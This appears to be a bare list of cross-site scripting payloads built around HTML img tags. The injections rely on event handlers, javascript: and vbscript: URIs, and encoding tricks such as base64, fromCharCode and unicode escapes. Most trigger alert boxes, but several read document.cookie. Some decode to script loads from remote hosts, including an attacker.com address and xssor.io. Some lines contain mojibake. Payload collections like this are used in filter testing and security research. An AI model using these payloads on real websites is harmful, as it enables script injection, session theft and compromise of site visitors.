- ><img id=XSS SRC=x onerror=alert(XSS);>
- <IMG id=XSS STYLE=”xss:expr/*XSS*/ession(alert(‘XSS’))”>
- <img+<iframe =”1" onerror=”alert(1)”>
- <img language=vbscript src=<b onerror=”alert 1">
- <img language=vbscript src=<b onerror=”alert 1"> // IE 8
- <img language=vbs src=<b onerror=alert#1/1#>
- <img language=vbs src=<b onerror=confirm#1/1#>
- <img longdesc=”src=” images=”” stop.png”=”” onerror=”alert(document.domain);//"” src=”x” alt=”showme”>
- <<img longdesc=”src=’x’onerror=alert(document.domain);//><img “ src=’showme’>
- <img longdesc=”src=’x’onerror=eval(window.atob(‘aW5jbHVkZT1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtpbmNsdWRlLnNyYz0naHR0cHM6Ly9hdHRhY2tlci5jb20vYXRtYWlsLmpzJztkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKGluY2x1ZGUpOw==’));//><img “ src=’showme’>
- <IMG LOW id=XSS SRC=”javascript:alert(‘XSS’)”>
- <IMG LOWid=XSS SRC=”javascript:alert(‘XSS’)”>
- <IMG+LOWSRC=”javascript:alert(1);”>
- <IMG LOWSRC=”javascript:alert(‘XiSS’)”>
- <;IMG LOWSRC=”;javascript:alert(‘;XSS’;);”;>;
- <IMG LOWSRC=”javascript:alert(‘XSS’);”>
- <IMG LOWSRC=”javascript:alert(‘XSS’)”>
- <IMG LOWSRC=\”javascript:alert(‘XSS’)\”>
- <IMG LOWSRC=”javascript:confirm(document.location)”>
- <img LOWSRC=”javascript:document.vulnerable=true;”>
- <IMG LOWSRC=”javascript:javascript:alert(1)”>
- <IMG LOWSRC_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
- ‘“><img onerror=alert(0) src=><”’
- <img onerror=alert(1) src <u></u>
- <img onerror=event.path.pop().alert(1) src>
- <img onerror=”location=’javascript:%61lert(1)’” src=”x”>
- <img onerror=”location=’javascript:=lert(1)’” src=”x”>
- <img onerror=”location=’javascript:\x255Cu0061lert(1)’” src=”x” >
- <img onerror=”location=’javascript:\x2561lert(1)’” src=”x”>
- “/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
- “/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
- “/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
- “/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
- “/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
- “/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
- “/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
- “/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
- “/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
- <img onload=alert(1)>//INJECTX
- ><img onmouseover=alert(Xss)>
- ��><img onmouseover=alert(��Xss��)>
- ><img onmouseover=alert(Xss-By-Muhaddi)>
- <IMG onmouseover=”alert(‘xxs’)”>
- <IMG onmouseover=”alert(“xxs”)”>
- <IMG onmouseover =confirm(1)>
- <;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;
- <;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;
- <img =”><script>alert(1)</script>”>
- <img “””><script>alert(“XSS by \nxss”)</script><marquee><h1>XSS by xss</h1></marquee>
- <img><script>alert(‘xss’)</script>”>
- <;IMG “;”;”;>;<;SCRIPT>;alert(“;XSS”;)<;/SCRIPT>;”;>;
- <IMG ><SCRIPT>alert(XSS)</SCRIPT>>
- <IMG “””><SCRIPT>alert(‘XSS’)</SCRIPT>”>
- <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
- <IMG SRC=javascript:a&
- <IMG+SRC=javascript:alert('X')>
- <IMG SRC=javascript:alert('XSS')>
- <IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')>
- <img/src=`%00` /id=confirm(1) /onerror=eval(id)
- <img/src=%00 id=confirm(1) onerror=eval(id)
- <img src=`%00`
 onerror=alert(1)

- <img src=`%00`
 onerror=confirm(1)

- <img/src=`%00` onerror=this.onerror=confirm
- <img/src=`%00` onerror=this.onerror=confirm(1)
- <img/src=`%00` onerror=this.onerror=confirm(1)
- <img src=jav ascr	ipt:al ert(0)>
- <img src=jav ascr	ipt:i=”x=docu ment.createElement(‘\u0053\u0043\u0052\u0049\u0050\u0054’);x.src=’http://xssor.io/xn.js';x.defer=true;doc ument.getElementsByTagName('head')[0].appendChild(x)";execScri pt(i)>
- <img src=jav ascr	ipt:i=”x=document.createElement(‘script’);x.src=’http://xssor.io/xn.js';x.defer=true;document.getElementsByTagName('head')[0].appendChild(x)";execScript(i)>
- <img src=’0' onerror=with(document)body.appendChild(createElement(‘script’)).src=’domain.js’>
- \”><img Src=0x94 onerror=alert(0x000123)>
- <IMG SRC=javascript:alert(
- <IMG+SRC=javascript:alert('X')>
- <img src=”javascript:alert('XSS')”>
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=javascript:alert('XSS')>
- IMG SRC=javascript:alert('XSS')>
- <IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('XS<WBR>;S')>
- <;IMG SRC=”; &;#14; javascript:alert(‘;XSS’;);”;>;
- <IMG SRC=”  javascript:alert(‘XSS’);”>
- <IMG SRC=”  javascript:alert(‘XSS’);”>
- <IMG SRC=”  javascript:confirm(document.location);”>
- <img SRC=”  javascript:document.vulnerable=true;”>
- <img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
- <img src=1 href=1 onerror=”javascript:alert(1)”></img>
- <img src=1 href=1 onerror=”javascript:alert(document.domain)”></img>
- <iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>
- <img src=’1' onerror=’alert(0)’ <
- <img src=’1' onerror/=alert(0) />
- <img src=’1'’onerror=’alert(0)’>
- <img src=’1'”onerror=”alert(0)”>
- <img src=’1'onerror=alert(0)>
- <img/src=’1'/onerror=alert(0)>
- <img src=”1" onerror=”alert(‘1’)”>
- <img src=”1" onerror=”alert(1)” />
- <img src=1 onerror=alert(1)>
- “]<img src=1 onerror=alert(1)>
- “><img src=1 onerror=alert(1)>.gif
- <img src=1 onerror=”alert(52)”
- <img src=1 onerror=alert(document.domain)>
- “]<img src=1 onerror=confirm(1)>
- <img src=1 onerror=’document.write(eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,4747,97,116,116,97,99,107,101,114,46,99,111,109,47,99,111,100,101,46,106,115,34,62,60,47,115,99,114,105,112,116,62,39,41,59)));’>
- <img src=1 onerror=Function(“aler”+”t(documen”+”t.domain)”)()>
- /#<img src=1 onerror=javascript:confirm(3)>
- <img src=1 onerror=jQuery.getScript(“domain.js”)>
- <img src=’1' onerror=\x00alert(0) />
- <img src=’1' onerror\x00=alert(0) />
- <img src=’1' onerror\x0b=alert(0) />
- <img src=”1" onerror=”alert(1)” />
- <img src=”1" onnerror=”alert(1)”>
- <img src=’1' o\x00nerr\x00or=alert(0) />
- <img src=1 style=”font-fam\22onerror\3d alert\28 1\29\20 ily:’aaa’;\”>
- <img src=’1'\x00onerror=alert(0)>
- <img/src=@  onerror = prompt(‘1’)
- <img src=”5" onerror=eval(“\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29”)></img>
- <img src=”5"onerror=eval(“\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29”)></img>
- <img src=”a”
- <img/src=aaa.jpg onerror=prompt(1);
- <img/src=aaa.jpg onerror=prompt(1);>
- <img/src=aaa.jpg onerror=prompt(1);
- /> <img src=’aaa’ onerror=confirm(document.domain)>
- “/> <img src=’aaa’ onerror=confirm(document.domain)>
- <img src=��\����<a href=’��>����onerror=alert(9)>
- <img/src=”.”alt=””onerror=”alert(‘zombie’)”/>
- <img src=��\��a=��>��onerror=alert(9)>
- <img src=”a” onerror=’eval(atob(“cHJvbXB0KDEpOw==”))’>
- <img src=a onerror=eval(String.fromCharCode(97,108,101,114,116,40,39,67,104,101,97,116,115,111,110,39,41))>
- <img src=a onerror=setInterval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))>
- <img src=a onerror=setInterval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))> // Using String.fromcharcode function
- <img src=asdf onerror=alert(document.cookie)>
- <img src attribute src=”data:image/svg+xml;base64,
- <img src=”blah>” onmouseover=”document.vulnerable=true;”>
- <img src=”blah”onmouseover=”document.vulnerable=true;”>
- <img src=<b onerror=alert(‘renwax23’);>
- <img src=data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs= onload=alert(1)>
- <img src=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==”>
- <img / src = \ ‘dfdfd \’ // onerror = \ ‘alert (document.cookie) \ ‘>
- <img src=&{document.vulnerable=true;};>
- <img src=evil.swf>
- <img src=foo.png onerror=alert(/xssed/) />
- <img src=foo.png onerror=alert(/xssed/) />
- <img src=http://127.0.0.1/myspace.asp>
- <img/src=’http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
- <img+src=”http://localhost">
- <img src=”http://teamultimate.in/wp-content/uploads/2017/03/slide-main.png">
- <img src=��http://victim/newUser?name=<script>alert(1)</script>��/>
- <img src=http://victim/newUser?name=<script>alert(1)</script>/>
- <img src=”http://www.baidu.com/img/bdlogo.gif">
- <img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #
- <img src=http://www.google.fr/images/srpr/logo3w.png onload=confirm(this.ownerDocument.cookie) width=0 height= 0 /> #
- <img src=”http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg">
- <IMG src=”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
- <;IMG SRC=”;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>;
- <IMG SRC=”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
- <img src=”http://www.w3schools.com/tags/planets.gif" width=”145" height=”126" alt=”Planets” usemap=”#planetmap”><map name=”planetmap”><area shape=”rect” coords=”0,0,145,126" a-=”>” href=”javascript:alert(-1)”></map>
- <img src=������id=’<img src=����>��onerror=alert(9)>
- <img src=��<img src=’<img src=.>��>��onerror=alert(9)>
- <! — <img src=” →<img src=x onerror=alert(1)//”>
- <![><img src=”]><img src=x onerror=alert(1)//”>
- <! — <img src=” →<img src=x onerror=alert(123)//”>
- <! — <img src=” →<img src=x onerror=alert(1)//”>//INJECTX
- <! — <img src=” →<img src=x onerror=alert(XSS)//”>
- <![><img src=”]><img src=x onerror=alert(XSS)//”>
- <! — <img src=” →<img src=x onerror=javascript:alert(1)//”>
- <![><img src=”]><img src=x onerror=javascript:alert(1)//”>
- <img src=i onerror=eval(jQuery.getScript(‘domain.js’))>
- <img src ?itworksonchrome?\/onerror = alert(1)>
- <img src ?itworksonchrome?\/onerror = alert(1)
- <img src ?itworksonchrome?\/onerror = alert(1)???
- <img src ?itworksonchrome?\/onerror = alert(1)
- <img src ?itworksonchrome?\/onerror = confirm(1)???
- <img src ?itworksonchrome?\/onerror = confirm(1)
- <img src=”jar:!/”>
- <IMG+SRC=”jav%09ascript:alert(1);”>
- <IMG+SRC=”jav%0dascript:alert(1);”>
- <IMG SRC=java%00script:confirm(document.location)>
- “<IMG src=java\0script:alert(\”XSS\”)>”;’ > out
- <iMgSRC = “JavaScript:alert(0);”>
- <img src=”javascript:alert(1)”>
- <IMG SRC=&{javascript:alert(1);};>
- <img src=”java&#script:alert(/1231/);”>
- <img src=”javascript:alert(2)”>
- ?img src=javascript:alert(document.domain)//.swf ?
- <img src=javascript:alert("XSS")>
- <;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;
- <IMG SRC=javascript:alert("XSS")>
- <IMG SRC=JaVaScRiPt:alert("XSS")>
- <IMG SRC=JaVaScRiPt:alert("XSS<WBR>")>
- <;IMG SRC=`javascript:alert(“;RSnake says, ‘;XSS’;”;)`>;
- <IMG SRC=`javascript:alert(“RSnake says, ‘XSS’”)`>
- <IMG SRC=`javascript:alert(“RSnake says### ‘XSS’”)`>
- <IMG SRC=javascript:alert(String.fromCharCode(88
- <;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG SRC=javascript:alert(String.fromCharCode(88###83###83))>
- <IMG src=”javascript:alert(‘X13SS’)”
- <IMG src=”jav ascript:alert(‘XaSS’);”>
- <IMG src=”jav ascript:alert(‘XbSS’);”>
- <IMG src=”jav ascript:alert(‘XcSS’);”>
- <IMG src=” javascript:alert(‘XdSS’);”>
- <img src=”javascript:alert(‘XSS’);”>
- <img src=”javascript:alert(‘XSS’)”>
- <IMG src=”javascript:alert(‘XSS’);”>
- <IMG src=javascript:alert(‘XSS’)>
- <IMG src=JaVaScRiPt:alert(‘XSS’)>
- <IMG src=JaVaScRiPt:alert(“XSS”)>
- <;IMG SRC=”;javascript:alert(‘;XSS’;);”;>;
- <;IMG SRC=”;javascript:alert(‘;XSS’;)”;
- <;IMG SRC=javascript:alert(‘;XSS’;)>;
- <IMG SRC=” javascript:alert(‘XSS’);”>
- <IMG SRC=” javascript:alert(‘XSS’);”>
- <IMG SRC=”jav ascript:alert(‘XSS’);”>
- <IMG SRC=”jav ascript:alert(‘XSS’);”>
- <IMG SRC=”jav ascript:alert(‘XSS’);”>
- <IMG SRC=”jav ascript:alert(‘XSS’);”>
- <IMG SRC=”javascript:alert(‘XSS’);”>
- <IMG SRC=”javascript:alert(‘XSS’)”
- <IMG SRC=jav ascript:alert(XSS);>
- <IMG SRC=javascript:alert(‘XSS’)>
- <IMG SRC=javascript:alert(“XSS”)>
- <IMG SRC=javascript:alert(XSS)>
- <IMG SRC=javascript:alert(XSS);>
- <IMG SRC=javascript:alert(XSS)
- <IMG SRC = “ j a v a s c r i p t : a l e r t ( ‘ X S S ‘ ) “ >
- <IMGSRC=”javascript:alert(‘XSS’)”>
- IMG SRC=”javascript:alert(‘XSS’);”>
- <IMG SRC=jAVasCrIPt:alert(XSS)>
- <;IMG SRC=JaVaScRiPt:alert(‘;XSS’;)>;
- <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
- <IMG SRC=JaVaScRiPt:alert(“XSS”)>
- <IMG SRC=`javascript:confirm(1)`>
- <IMG SRC=`javascript:confirm(document.cookie)`>
- <IMG SRC=”jav ascript:confirm(document.location);”>
- <IMG SRC=”javascript:confirm(document.location);”>
- <IMG SRC=”javascript:confirm(document.location)”
- <IMG SRC=javascript:confirm(document.location)>
- <IMG SRC=JaVaScRiPt:confirm(document.location)>
- <IMG SRC=javascript:confirm("XSS")>
- <IMG SRC=JaVaScRiPt:confirm("XSS<WBR>")>
- <IMG SRC=javascript:confirm(String.fromCharCode(88,83,83))>
- <img src=”javascript:document.vulnerable=true;”>
- <img SRC=”jav ascript:document.vulnerable=true;”>
- <img SRC=”javascript:document.vulnerable=true;”>
- <img SRC=”javascript:document.vulnerable=true;”
- <IMG SRC=`javascriptGalert(“)`>
- <IMG SRC=`javascriptGalert(“Look its, ‘XSS’”)`>
- <IMG SRC=`javascriptGalert(\”XSS\”)`>
- <IMG SRC=`javascript:javascript:alert(1)`>
- <IMG SRC=”jav ascript:javascript:alert(1);”>
- <IMG SRC=”jav ascript:javascript:alert(1);”>
- <IMG SRC=”jav ascript:javascript:alert(1);”>
- <IMG SRC=”jav ascript:javascript:alert(1);”>
- <IMG SRC=”javascript:javascript:alert(1);”>
- <IMG SRC=”javascript:javascript:alert(1)”
- <IMG SRC=javascript:javascript:alert(1)>
- <IMG SRC=javascript:prompt(document.location)>
- <IMG SRC=JaVaScRiPt:prompt(document.location)>
- <img src=javascript:while([{}]);>
- “><img src=javascript:while([{}]);>
- <IMG SRC=javascrscriptipt:alert(‘XSS’)>
- <img src=javcript:alert(/1231/);>
- <IMG SRC=jav..?..S’)>
- <IMG+SRC=”jav	ascript:alert(1);”>
- <IMG SRC=”jav	ascript:alert(<WBR>’XSS’);”><IMG SRC=”jav
ascript:alert(<WBR>’XSS’);”><IMG SRC=”jav
ascript:alert(<WBR>’XSS’);”>
- <;IMG SRC=”;jav&;#x09;ascript:alert(‘;XSS’;);”;>;
- <;IMG SRC=”;jav	ascript:alert(‘;XSS’;);”;>;
- <IMG SRC=”jav	ascript:alert(‘XSS’);”>
- <IMG SRC=”jav	ascript:alert(‘XSS’);”>
- <IMG SRC=\”jav	ascript:alert(‘XSS’);\”>
- <IMG SRC=jav	ascript:alert(XSS);>
- <IMG SRC=”jav	ascript:confirm(document.location);”>
- <IMG SRC=”jav	ascript:confirm(<WBR>document.location);”>
- <IMG+SRC=”jav
ascript:alert(1);”>
- <IMG SRC=”jav
ascript:alert(<WBR>’XSS’);”>
- <;IMG SRC=”;jav&;#x0A;ascript:alert(‘;XSS’;);”;>;
- <IMG SRC=”jav
ascript:alert(‘XSS’);”>
- <IMG SRC=”jav
ascript:alert(‘XSS’);”>
- <IMG SRC=\”jav
ascript:alert(‘XSS’);\”>
- <IMG SRC=”jav
ascript:confirm(document.location);”>
- <IMG SRC=”jav
ascript:confirm(<WBR>document.location);”>
- <IMG+SRC=”jav#x0D;ascript:alert(1);”>
- <IMG SRC=”jav
ascript:alert(<WBR>’XSS’);”>
- <;IMG SRC=”;jav&;#x0D;ascript:alert(‘;XSS’;);”;>;
- <IMG SRC=”jav
ascript:alert(‘XSS’);”>
- <IMG SRC=”jav
ascript:alert(‘XSS’);
- <IMG SRC=\”jav
ascript:alert(‘XSS’);\”>
- <IMG SRC=”jav
ascript:confirm(document.location);”>
- <IMG SRC=”jav
ascript:confirm(<WBR>document.location);”>
- <IMG+SRC=jAvascript:alert(1)>
- <IMG src=”livescript:[code]”>
- <;IMG SRC=”;livescript:[code]”;>;
- <IMG SRC=”livescript:[code]”>
- <IMG SRC=”livescript:[code][/code]”>
- <IMG SRC=”livescript:[code]”> (netscape only)
- <img src=”livescript:document.vulnerable=true;”>
- <img src=”Mario Heiderich says that svg SHOULD not be executed trough image tags” onerror=”javascript:document.write(‘\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e’);”></img>
- <img/src=”mars.png”alt=”mars”>
- <IMG src=”mocha:[code]”>
- <;IMG SRC=”;mocha:[code]”;>;
- <IMG SRC=”mocha:[code]”>
- <IMG SRC=”mocha:[code]”> (netscape only)
- <img src=”mocha:document.vulnerable=true;”>
- #”><img src=M onerror=alert(‘XSS’);>
- <IMG SRC_NeatHtmlReplace=”  javascript:alert(‘XSS’);”>
- <IMG SRC_NeatHtmlReplace=”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
- <IMG SRC_NeatHtmlReplace=”javascript:alert("XSS")”>
- <IMG SRC_NeatHtmlReplace=”javascript:alert(String.fromCharCode(88,83,83))”>
- <IMG SRC_NeatHtmlReplace=” j a v a s c r i p t : a l e r t ( ‘ X S S ‘ ) “ >
- <IMG SRC_NeatHtmlReplace=”javascript:alert(‘XSS’);”>
- <IMG SRC_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
- <IMG SRC_NeatHtmlReplace=”JaVaScRiPt:alert(‘XSS’)”>
- <IMG SRC_NeatHtmlReplace=”jav	ascript:alert(‘XSS’);”>
- <IMG SRC_NeatHtmlReplace=”jav
ascript:alert(‘XSS’);”>
- <IMG SRC_NeatHtmlReplace=”jav
ascript:alert(‘XSS’);”>
- <IMG SRC_NeatHtmlReplace=”livescript:[code]”>
- <IMG SRC_NeatHtmlReplace=”mocha:[code]”>
- <IMG SRC_NeatHtmlReplace=’vbscript:msgbox(“XSS”)’>
- <img src=``
 onerror=alert(1)

- <img src=N onerror=eval(javascript:document.write(unescape(‘ <script src=”domain.js”></script>’));)>
- <IMG SRC=”/” onerror=javascript:alert('XSS')>
- ←`<img/src=` onerror=alert(1)> — !>
- ←`<img/src=` onerror=alert(1)> — !>
- <img src=/ onerror=alert(1)>
- <img+src+onerror=alert(1)>
- <img src=��>��onerror=alert(9)>
- <IMG SRC=/ onerror=”alert(String.fromCharCode(88
- <IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))”></img>
- <img src onerror /” ‘“= alt=alert(1)//”>
- <img src onerror /” ‘“= alt=javascript:alert(1)//”>
- ←`<img/src=` onerror=confirm(1)> — !>
- <img/ src//’onerror/’’/=confirm(1)//’>
- <img/src=` onerror=confirm(1)>
- “<img/src=` onerror=confirm(1)>”
- “>←`<img/src=` onerror=confirm(1)> — !>
- “><img src=”” onerror=”document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))”>
- “><img src=””onerror=”document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))”>
- <img src=”#” onerror=”$.getScript(‘domain.js’)”>
- <IMG SRC=”/” onerror=”jav	ascript:alert(‘XSS’);”>
- <img/ src=`~` onerror=prompt(1)>
- <img/src=@ onerror = prompt(‘1’)
- <img/src=`` onerror=this.onerror=confirm(1)
- <img/src=`` onerror=this.onerror=confirm(1)
- <img src=”#” onerror=”var a=String.fromCharCode(47);$.getScript(a+a+’domain.sj’+a+’4091')”>
- <img src=# onerror\x3D”javascript:alert(1)” >
- <IMG SRC=”/” onerror=javascript:alert('XSS')>
- <IMG SRC=/ onkeydown=”alert(String.fromCharCode(88,83,83))”></img>
- <IMG SRC=/ onkeypress=”alert(String.fromCharCode(88,83,83))”></img>
- <IMG SRC=/ onkeyup=”alert(String.fromCharCode(88,83,83))”></img>
- <IMG SRC=/ onload=”alert(String.fromCharCode(88,83,83))”></img>
- <img src=//\ onload=confirm(1)>
- <img src=”#” onload=”s=document.createElement(‘script’);s.src=’domain.js’+Math.random();document.body.appendChild(s)” border=”0">
- <IMG SRC= onmouseover=”alert(‘xxs’)”>
- <IMG SRC= onmouseover=”alert(“xxs”)”>
- <IMG SRC=# onmouseover=”alert(‘xxs’)”>
- <IMG SRC=# onmouseover=”alert(“xxs”)”>
- <img/src=q onerror=’new Function`al\ert\`1\``’>
- <img/src=q onerror=’new Function`al\ert\`OPENBUGBOUNTY\``’>
- <img/src=renwax23%0A/**/onerror=eval(‘al’%2b’ert(1)’)>
- <img src=””><SCRIPT/ASYNC/SRC=”/a3a?a?L”>
- <img src=” →</script><svg/onload=alert(1)//”>
- <img src=” →</script><svg/onload=alert(1)//”><! — <script>
- <img srcset=popup=1; onerror=popup=1;>
- <img src=”test.jpg” alt =”``onload=xss()”>
- <img src=test.jpg?value=”>Yes, we are still inside a tag!”>
- <img src=’test’ onmouseover=’alert(2)’>
- <img src=”/” =_=” title=”onerror=’/**/prompt(1)’”>
- <img src=”/” =_=” title=”onerror=’prompt(1)’”>
- “><img src=”/” =_=” title=”onerror=’prompt(1)’”>
- <img SRC=’vbscript:document.vulnerable=true;’>
- <IMG SRC=’vbscript:msgbox(“anyunix”)’>
- <IMG SRC=’vbscript:msgbox(document.location)’>
- <IMG src=’vbscript:msgbox(“XmSS”)’>
- <;IMG SRC=’;vbscript:msgbox(“;XSS”;)’;>;
- <IMG SRC=’vbscript:msgbox(“XSS”)’>
- <IMG SRC=’vbscript:msgbox(“XSS”)’>
- <IMG SRC=’vbscript:msgbox(\”XSS\”)’>
- <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
- <img src\x00=x onerror=”javascript:alert(1)”>
- <img src\x09=x onerror=”javascript:alert(1)”>
- “><img/src=x%0Aonerror=prompt`1`>
- <img src\x10=x onerror=”javascript:alert(1)”>
- <img src\x11=x onerror=”javascript:alert(1)”>
- <img src\x12=x onerror=”javascript:alert(1)”>
- <img src\x13=x onerror=”javascript:alert(1)”>
- `”’><img src=’#\x27 onerror=javascript:alert(1)>
- <img src\x32=x onerror=”javascript:alert(1)”>
- <img src\x47=x onerror=”javascript:alert(1)”>
